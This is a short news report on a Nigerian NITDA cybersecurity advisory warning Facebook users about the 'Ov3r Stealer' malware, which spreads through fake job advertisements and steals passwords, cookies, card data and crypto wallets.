The National Information Technology (NITDA)’s Computer Emergency Readiness and Response Team (CERRT) has alerted Nigerians to a new malware attack identified as ‘Ov3r Steale’ targeting Facebook users. The Agency in an advisory released recently said the new threat deceived Facebook users to click on malicious links under the guise of job advertisement through which it gains access to the users’ sensitive information and extracts their data for attacks.
“A new threat, known as “Ov3r Stealer” malware, has emerged, targeting users on Facebook, spreading through deceptive job advertisements and fake accounts. “Users become infected by clicking on these malicious advertisement links. The malware employs various execution methods to extract sensitive data from victims.
“The Ov3r_Stealer malware can also be used as a dropper for other malware, including ransomware,” the Agency in charge of technology regulation in Nigeria stated. NITDA added that when users clicked on the advertisement, they are redirected to a malicious Discord URL, which executes the malware through a PowerShell script masquerading as a Windows Control Panel (CPL) file to download the malware payload from a GitHub repository.
“Ov3r_Stealer poses a significant risk by silently exfiltrating a wide range of personal and sensitive information including geolocation (based on IP), hardware info, passwords, cookies, credit card information, auto-fills, browser extensions, crypto wallets, Office documents, and antivirus product information.